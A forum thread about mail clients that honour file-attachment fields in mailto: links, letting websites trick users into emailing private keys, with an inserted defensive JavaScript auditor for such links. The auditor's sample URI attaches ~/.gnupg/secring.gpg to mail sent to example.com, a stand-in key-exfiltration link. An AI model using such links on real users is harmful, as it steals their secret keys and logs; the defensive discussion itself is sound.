Hey Leo, mail me your private key

Hi @Leo, I know you are a PGP user for email signing and encryption, so this is probably of interest to you:

Several email clients were found to be vulnerable to sending the GPG or S/MIME private keys by the user clicking on a mailto: link on a website!


I never knew you could include an attachment in a “mailto” link. That’s pretty neat.

I can’t think of a situation where this would be useful on a web site except as an attack… you’re unlikely to know the path of average user files on a system since people aren’t robots… thus it would only work for “static” files, like logs and config files… the kind of files likely to have security implications.
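To make the mechanism concrete, here is a small added example (my own code, not from any of the posters or from the research they refer to) that parses a mailto: URI the way a web client or link-handler might, and flags header fields that name a local file. RFC 6068 only defines `to`, `subject`, `body`, `cc`, `bcc` and `in-reply-to`; the `attach`/`attachment` field names below are assumed illustrations of the client-specific extensions the thread is talking about, and the sample URI and its paths are constructed, not taken from any real site.

```javascript
// Added example: audit a mailto: URI for header fields that would make a
// mail client attach a local file. Not code from the original thread.

// Fields RFC 6068 names explicitly; anything else is a client extension.
const SAFE_FIELDS = new Set(["to", "subject", "body", "cc", "bcc", "in-reply-to"]);
// Assumed field names used by some clients to attach a file (illustrative).
const FILE_FIELDS = new Set(["attach", "attachment"]);

function decode(s) {
  // Percent-decoding can throw on malformed input; keep the raw text then.
  try { return decodeURIComponent(s); } catch { return s; }
}

// Split "mailto:addr?name=value&name=value" into ordered {name, value} fields.
function parseMailto(uri) {
  if (!/^mailto:/i.test(uri)) throw new Error("not a mailto: URI");
  const rest = uri.slice("mailto:".length);
  const q = rest.indexOf("?");
  const toPart = q === -1 ? rest : rest.slice(0, q);
  const query = q === -1 ? "" : rest.slice(q + 1);
  const fields = [];
  if (toPart) fields.push({ name: "to", value: decode(toPart) });
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    // Field names are case-insensitive (RFC 6068), so normalise them.
    const name = decode(eq === -1 ? pair : pair.slice(0, eq)).toLowerCase();
    const value = eq === -1 ? "" : decode(pair.slice(eq + 1));
    fields.push({ name, value });
  }
  return fields;
}

// Return the fields a client can safely honour, plus findings for the rest.
function auditMailto(uri) {
  const safe = [];
  const findings = [];
  for (const f of parseMailto(uri)) {
    if (FILE_FIELDS.has(f.name)) {
      findings.push({ severity: "high", field: f.name, value: f.value,
                      reason: "names a local file to attach" });
    } else if (!SAFE_FIELDS.has(f.name)) {
      findings.push({ severity: "medium", field: f.name, value: f.value,
                      reason: "non-standard header field" });
    } else {
      safe.push(f);
    }
  }
  return { safe, findings };
}

// Constructed sample: a "send us your logs" link that also asks for a key file.
const SAMPLE =
  "mailto:support@example.com?subject=Logs&attach=~/.gnupg/secring.gpg&attach=/var/log/syslog";

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditMailto(SAMPLE), null, 2));
}
```

The point of the split is that a client only needs `safe` to compose the message; everything in `findings` is either dropped or shown to the user before any file is read. Note that the link target is only a file *path*, exactly the "static file" case above: the attacker has to guess where the file lives, which is why default locations like a home-directory keyring are the natural target.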

Exactly that use case, a scenario where you need a user to send logs in order to provide technical support.

A reasonable application is built by people who know they will need to support it, and have built in a means. My router has this option built in: it has a feedback page where it will extract and zip the log files and other pertinent information and send it appropriately, attaching a prompted support ID if needed.

If someone is adhockingly (my new made up word of the day) assuming the install location (remember some people install files to non-standard locations) and assuming the location of log files, the company producing the software needs a lot more support than the user will ever succeed in requesting. (IMHO)

It’s why I don’t keep my secret key in an available directory. It’s also why I secure it with a strong password. Every worthwhile GnuPG how-to mentions these measures. Many say not to put your secret key on any device. Keep it in a safe. Or Yubikey.


Having done a tour of end-user support for a few years, there’s nothing reasonable about the applications they use or the way they work.